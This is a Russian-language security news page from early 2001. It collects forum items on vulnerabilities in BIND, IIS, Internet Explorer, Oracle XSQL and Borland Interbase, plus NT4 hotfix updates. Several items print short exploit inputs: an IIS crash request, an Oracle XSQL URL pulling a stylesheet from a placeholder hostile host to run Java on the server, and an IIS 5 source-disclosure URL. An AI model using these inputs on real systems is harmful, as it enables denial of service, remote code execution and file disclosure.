Security Page

Обновлен комплексный Post SP6 Hotfix для WinNT 4.0 (v6.23)
/Игорь Митюрин 8.02.2001 10:41:16/:

Обновлен комплексный пост SP6 хотфикс для Windows NT4.0 Server и Workstation. 23 хотфикса устанавливаются за один раз. Все пересечения учтены.
Файл можно забрать с моей домашней страницы.

Серьёзная уязвимость в BIND.
/HackZone.Ru/RSN Forum 31.01.2001 02:45:05/:

CERT опубликованны два переполнения буфера и "ошибка форматной строки" в BIND 4 и 8, позволяющие захватить контроль над DNS -сервером. Практически это может привести к неработоспособности значительной части Интернета.
FreeBSD и практически все производители коммерческих версий Linux уже объявили о патчах для BIND, но многие ли ими воспользуются?

Обновлен комплексный Post SP6 Hotfix для WinNT 4.0
/Игорь Митюрин 29.01.2001 17:52:58/:

Обновлен комплексный пост SP6 хотфикс для Windows NT4.0 Server и Workstation. 22 хотфикса устанавливаются за один раз. Все пересечения учтены.
Файл можно забрать с моей домашней страницы.

Серьёзные уязвимости популярных сервисов
/HackZone.Ru/RSN Forum 27.01.2001 00:04:12/:

Новости RSN форума
Новая ошибка в популярных WWW-почты использующих таблицы стилей (Hotmail, ZDNet).
Специально сформированное письмо может с переопределить служебные кнобки в Web-итерфейсе. (2 сообщения: 24/1- Ben Li , 26/1- Gregory Duchemin)
Переполнение буфера в Netscape Communicator 6. (1- Anders Ingebornlt)
AOL Instnat Messenger позволяет выполнить скрипты под видом картинок (1 - Dont Know Guilt )

Ведщий форума A. V. Komlin

Рождественский набор ошибок от Микрософт.
/HackZone.Ru/RSN Forum 17.01.2001 04:09:35/:

1.IIS рушится, получив запрос вида GET /%0%0 HTTP/1.0 - NtWaK0
2.Переполнение стека в программах использующих MSHTML.DLL (IE, Outlook) - Thor Larholm
3. Уязвимость в IE+WMP позволяет загрузить в роли WMP skin апплет (.jar), и получить доступ к диску по чтению. - Guninski
4. Web Client позволяет перехватить NTLM-хэш пользователя- Ben Greenbaum
С уважением, ведущий RSN форума - A.V. Komlin

Открыт умышленно встроенный чёрный ход в продуктах Borland/Inprise (Interbase, Firebird )
/HackZone.Ru/RSN Forum 12.01.2001 16:03:33/:

CERT опубликовало сообщение о чёрном ходе предназначенном для удалённого получения несанкционированных административных привилегий в продуктах Borland/Inprise (Interbase, Firebird ).
Баг был открыт благодаря публикации исходных текстов продуктов.
Borland выпустило патч.

Oracle 8.1.7 позволяет несанкционированно исполнять удалённые сервлеты.
/HackZone.Ru/RSN Forum 10.01.2001 13:18:51/:

Oracle XSQL servlet позволяет несанкционированно исполнять удалённые сервлеты. Это происходит 1) из-за возможности указывать внешние таблицы стилей

http://XSQL-SERVER/EXISTING.xsql?xml-stylesheet=http://HOSTILE/ora.xsl

2) возможности вставлять в последние объекты java.

<xsl:xmlns:jstr="http://www.oracle.com/XSL/Transform/java/java.lang.String" version="1.0">
...
<xsl:variable name="str1" select="jstr:new('java on the server')" />
...

MindResourses 2001
/dl 10.01.2001 03:08:42/:

3-4 февраля в Москве пройдет demoparty MindResourses 2001. Оно обещает быть одним из крупнейших событий на российской демосцене за последние два года.
О своем участии уже заявили такие известные группы как Proxium, T-Rex, Hrg, Accept Core, Energy, WRC, Hbg.
Ожидаются и новые лица, приглашаются все желающие, гарантируются реальные призы и подарки.

Очередная ошибка IIS 5
/HackZone.Ru/RSN Forum 9.01.2001 03:54:06/:

Очередная ошибка IIS 5 позволяет просматривать CGI файлы добавляя ("%3F+.htr")

http://TARGETIIS/scripts/test.pl%3F+.htr